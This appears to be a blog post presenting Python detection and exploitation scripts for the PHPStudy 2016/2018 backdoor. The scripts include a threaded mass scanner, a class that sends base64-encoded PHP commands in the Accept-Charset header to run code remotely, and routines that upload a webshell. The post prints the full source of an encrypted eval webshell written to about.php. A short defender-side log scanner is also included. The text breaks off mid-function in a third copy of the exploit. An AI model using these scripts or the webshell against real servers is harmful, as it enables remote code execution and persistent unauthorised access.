Writing a POC/EXP for the PHPStudy Backdoor Vulnerability

It has been a while since the PHPStudy backdoor incident, and the vulnerability has already been reproduced. There are plenty of detection POCs online, so why write my own? Because I have not written code in a long time, and this vulnerability is a good chance to get back into it. I wrote half of the code before the National Day holiday, got held up by all sorts of things, and finished it today. This time the code uses an object-oriented design with parameterised arguments; for the vulnerability itself this approach is overkill, but it serves as coding practice for my graduation project (said quietly). The script supports detecting and exploiting the PHPStudy 2018 and 2016 backdoors and uploading a shell directly.

Code and results

Batch detection POC

Supports a user-supplied target file

```python
'''
@Description:
@Author: demos
@Github: https://github.com/demossl
'''

import requests
import random
import threading
import threadpool
import sys
import base64
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

USER_AGENTS = [
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
"Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
"Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]
TIME_OUT = 15

def check(url):
    # The backdoor executes the base64-encoded PHP carried in Accept-Charset
    # when the request also sends Accept-Encoding: gzip,deflate.
    payload = "phpinfo();"
    payload = base64.b64encode(payload.encode('utf-8'))
    headers = {}
    headers['User-Agent'] = random.choice(USER_AGENTS)
    headers['Accept-Encoding'] = 'gzip,deflate'
    headers['Accept-Charset'] = payload
    try:
        result = requests.get(url, headers=headers, timeout=TIME_OUT)
        result.encoding = 'gbk'
        if "phpinfo" in str(result.content):
            print('[+] Target is vulnerable.')
            with open('success.txt', 'a') as f:
                f.write(url + '\n')
            return True
        else:
            print('[-] Target is NOT vulnerable.')
            return False
    except Exception as e:
        print('[-] some error: {}'.format(e))
        return False

def main():
    files = input('please input the files:\n')
    try:
        with open(files, 'r') as f:
            lines = f.read().splitlines()
        print(lines)
        task_pool = threadpool.ThreadPool(10)
        # Named reqs rather than requests so the HTTP module is not shadowed.
        reqs = threadpool.makeRequests(check, lines)
        for req in reqs:
            task_pool.putRequest(req)
        task_pool.wait()
    except KeyboardInterrupt:
        sys.exit()

if __name__ == '__main__':
    main()
```
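The check above works because the backdoored PHP build executes whatever base64-decodes from the Accept-Charset header when the request also carries Accept-Encoding: gzip,deflate, so that same header pair is what to look for on the server side. As an added defender-side example (my code, not part of the original post), the following scans constructed access-log lines and flags requests whose Accept-Charset decodes to PHP code; it assumes a custom log format that records those two headers, since the default Apache combined format does not, and the sample lines are made up.

```python
import base64
import binascii
import re

# Constructed sample access-log lines (not real traffic). They assume a custom
# Apache LogFormat that appends "%{Accept-Encoding}i" and "%{Accept-Charset}i"
# as the last two quoted fields; the default combined format does not log them.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Oct/2019:10:00:01 +0800] "GET /index.php HTTP/1.1" 200 512 "gzip,deflate" "cGhwaW5mbygpOw=="
10.0.0.6 - - [08/Oct/2019:10:00:02 +0800] "GET /index.php HTTP/1.1" 200 512 "gzip, deflate, br" "utf-8, iso-8859-1;q=0.5"
10.0.0.7 - - [08/Oct/2019:10:00:03 +0800] "GET /about.php HTTP/1.1" 200 64 "gzip,deflate" "-"
10.0.0.8 - - [08/Oct/2019:10:00:04 +0800] "GET /index.php HTTP/1.1" 200 512 "gzip,deflate" "c3lzdGVtKCJ3aG9hbWkiKTs="
10.0.0.9 - - [08/Oct/2019:10:00:05 +0800] "GET /index.php HTTP/1.1" 200 512 "gzip,deflate" "utf8"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<accept_encoding>[^"]*)" '
    r'"(?P<accept_charset>[^"]*)"$'
)

# A genuine Accept-Charset value is a list of charset names; none of these
# tokens can appear in one, so their presence after decoding means PHP code.
PHP_MARKERS = ("<?php", "eval(", "system(", "phpinfo(", "file_put_contents(",
               "exec(", "shell_exec(", "passthru(", "assert(", "$_")


def decode_header(value):
    """Return the header value decoded as base64 text, or None when it is not
    strict base64 ('utf-8, iso-8859-1' fails on '-' and ',') or not UTF-8
    ('utf8' is valid base64 but decodes to bytes that are not UTF-8)."""
    compact = value.replace(" ", "")
    if not compact or compact == "-":
        return None
    try:
        raw = base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def flag_request(line):
    """Parse one log line; return a finding dict when Accept-Charset carries
    base64-encoded PHP, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_header(m.group("accept_charset"))
    if decoded is None or not any(marker in decoded for marker in PHP_MARKERS):
        return None
    return {
        "ip": m.group("ip"),
        "request": m.group("request"),
        # Record whether Accept-Encoding matched the value the POC sends, so
        # analysts can separate complete trigger attempts from partial ones.
        "trigger_matched": m.group("accept_encoding") == "gzip,deflate",
        "decoded_payload": decoded,
    }


def scan_log(text):
    """Run flag_request over every line and collect the findings in order."""
    findings = []
    for line in text.splitlines():
        finding = flag_request(line)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("[!] {ip} {request} trigger={trigger_matched} payload={decoded_payload!r}".format(**f))
```

Current browsers no longer send Accept-Charset at all, so any non-empty value in that header is unusual enough on its own to be worth logging.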

Detection, exploitation and shell upload with command-line arguments

```python
'''
@Description:
@Author: demos
@Github: https://github.com/demossl
'''

import requests
import argparse
import base64
import random
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

USER_AGENTS = [
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
"Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
"Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]
TIME_OUT = 15

class phpstudy_backdoor_getshell(object):
    def __init__(self, url, command):
        self._url = url
        self._command = command

    # Accessors - getter() methods
    @property
    def url(self):
        return self._url

    @property
    def command(self):
        return self._command

    # Mutators - setter() methods
    @url.setter
    def url(self, url):
        self._url = url

    @command.setter
    def command(self, command):
        self._command = command

    def check_Target(self):
        # "cGhwaW5mbygpOw==" is base64 for phpinfo();
        poc = {
            "Accept-Charset": "cGhwaW5mbygpOw==",
            "Accept-Encoding": "gzip,deflate"
        }
        try:
            PocRequest = requests.get(self._url, headers=poc, timeout=TIME_OUT)
            if "phpinfo" in str(PocRequest.content):
                print('[+] Target is vulnerable.')
                return True
            else:
                print('[-] Target is NOT vulnerable.')
                return False
        except Exception as e:
            print('[-] Looks Like Something Wrong: {}'.format(e))
            return False

    def exploit(self):
        headers = {}
        headers['User-Agent'] = random.choice(USER_AGENTS)
        headers['Accept-Encoding'] = 'gzip,deflate'
        headers['Accept-Charset'] = self._command
        try:
            response = requests.get(self._url, headers=headers, timeout=TIME_OUT)
            response.encoding = 'gbk'
            if response.status_code == 200:
                print('[+] Command Execute Successful.')
                print(response.text)
            else:
                print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
        except Exception as e:
            print('[-] Looks Like Something Wrong: {}\n'.format(e))

    def upload_shell_2018(self):
        headers = {}
        headers['User-Agent'] = random.choice(USER_AGENTS)
        headers['Accept-Encoding'] = 'gzip,deflate'
        # base64 payload not reproduced on this page
        headers['Accept-Charset'] = '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'
        try:
            response = requests.get(self._url, headers=headers, timeout=TIME_OUT)
            response.encoding = 'gbk'
            if response.status_code == 200:
                print('[+] Upload Successful.')
                print('[+] The webshell is {}//{}/about.php'.format(self._url.split('/')[0], self._url.split('/')[2]))
            else:
                print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
        except Exception as e:
            print('[-] Looks Like Something Wrong: {}\n'.format(e))

    def upload_shell_2016(self):
        headers = {}
        headers['User-Agent'] = random.choice(USER_AGENTS)
        headers['Accept-Encoding'] = 'gzip,deflate'
        # base64 payload not reproduced on this page
        headers['Accept-Charset'] = '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'
        try:
            response = requests.get(self._url, headers=headers, timeout=TIME_OUT)
            response.encoding = 'gbk'
            if response.status_code == 200:
                print('[+] Upload Successful.')
                print('[+] The webshell is {}//{}/about.php'.format(self._url.split('/')[0], self._url.split('/')[2]))
            else:
                print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
        except Exception as e:
            print('[-] Looks Like Something Wrong: {}\n'.format(e))


def main():
    parse = argparse.ArgumentParser(description='EXP for phpstudy_backdoor.')
    parse.usage = """phpstudy_backdoor_getshell.py [-h] [-u URL] [-c ...]

example: python3 phpstudy_backdoor_getshell.py -u http://192.168.1.103/index.php -c 'system(\\"whoami\\");'

使用反斜杠和单双引号防止转义的问题,并解决argparse下以空格解析参数不能当做一个字符串的问题
"""
    parse.add_argument('-u', '--url', help='The Target Url')
    parse.add_argument('-c', '--command', nargs=argparse.REMAINDER, help='Please input the exploit command')
    parse.add_argument('-w8', '--webshell_8', action='store_true', help='upload a Behinder webshell for phpstudy2018')
    parse.add_argument('-w6', '--webshell_6', action='store_true', help='upload a Behinder webshell for phpstudy2016')
    args = parse.parse_args()

    x = phpstudy_backdoor_getshell('', '')
    if len(sys.argv) < 2:
        parse.print_help()
    elif 2 < len(sys.argv) < 4:
        # Only -u given: run the detection check.
        if args.url:
            x.url = args.url
            x.check_Target()
        else:
            print('[-] some error!')
    elif len(sys.argv) >= 4:
        if args.url and args.command:
            # REMAINDER yields a list; join it back into a single command string.
            commands = ''
            for cmd in args.command:
                commands += cmd + ' '
            command = base64.b64encode(commands.encode('utf-8'))
            x.url = args.url
            x.command = command
            x.exploit()
        elif args.url and args.webshell_8:
            x.url = args.url
            x.upload_shell_2018()
        elif args.url and args.webshell_6:
            x.url = args.url
            x.upload_shell_2016()
        else:
            print('[-] some error!')

if __name__ == '__main__':
    main()
```

phpstudy 2018

phpstudy 2016

The only difference for 2016 is that the web root used when uploading the shell is not the same as for 2018; the path is changed as follows

```php
file_put_contents('./WWW/about.php', '<?php
@error_reporting(0);
session_start();
if (isset($_GET["pass"]))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION["k"]=$key;
    print $key;
}
else
{
    $key=$_SESSION["k"];
    $post=file_get_contents("php://input");
    if(!extension_loaded("openssl"))
    {
        $t="base64_"."decode";
        $post=$t($post."");

        for($i=0;$i<strlen($post);$i++) {
            $post[$i] = $post[$i]^$key[$i+1&15];
        }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode("|",$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __construct($p) {eval($p."");}}
    @new C($params);
}
?>');
```

Detection, exploitation and shell upload without command-line arguments

The result is the same as the parameterised version, so no screenshots this time; the difference is that when executing commands or uploading the shell there is no longer the escaping problem that arises when parsing arguments.

Code

```python
'''
@Description:
@Author: demos
@Github: https://github.com/demossl
'''

import requests
import base64
import random
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


USER_AGENTS = [
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
"Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
"Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]
TIME_OUT = 15

class phpstudy_backdoor_getshell(object):
    def __init__(self, url, command):
        self._url = url
        self._command = command

    # Accessors - getter() methods
    @property
    def url(self):
        return self._url

    @property
    def command(self):
        return self._command

    # Mutators - setter() methods
    @url.setter
    def url(self, url):
        self._url = url

    @command.setter
    def command(self, command):
        self._command = command

    def check_Target(self):
        # "cGhwaW5mbygpOw==" is base64 for phpinfo();
        poc = {
            "Accept-Charset": "cGhwaW5mbygpOw==",
            "Accept-Encoding": "gzip,deflate"
        }
        try:
            PocRequest = requests.get(self._url, headers=poc, timeout=TIME_OUT)
            if "phpinfo" in str(PocRequest.content):
                print('[+] Target is vulnerable.')
                return True
            else:
                print('[-] Target is NOT vulnerable.')
                return False
        except Exception as e:
            print('[-] Looks Like Something Wrong: {}'.format(e))
            return False

    def exploit(self):
        headers = {}
        headers['User-Agent'] = random.choice(USER_AGENTS)
        headers['Accept-Encoding'] = 'gzip,deflate'
        headers['Accept-Charset'] = self._command
        try:
            response = requests.get(self._url, headers=headers, timeout=TIME_OUT)
            response.encoding = 'gbk'
            if response.status_code == 200:
                print('[+] Command Execute Successful.')
                print(response.text)
            else:
                print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
        except Exception as e:
            print('[-] Looks Like Something Wrong: {}\n'.format(e))

    def upload_shell_2018(self):
        headers = {}
        headers['User-Agent'] = random.choice(USER_AGENTS)
        headers['Accept-Encoding'] = 'gzip,deflate'
        # base64 of the file_put_contents('./PHPTutorial/WWW/about.php', ...) statement
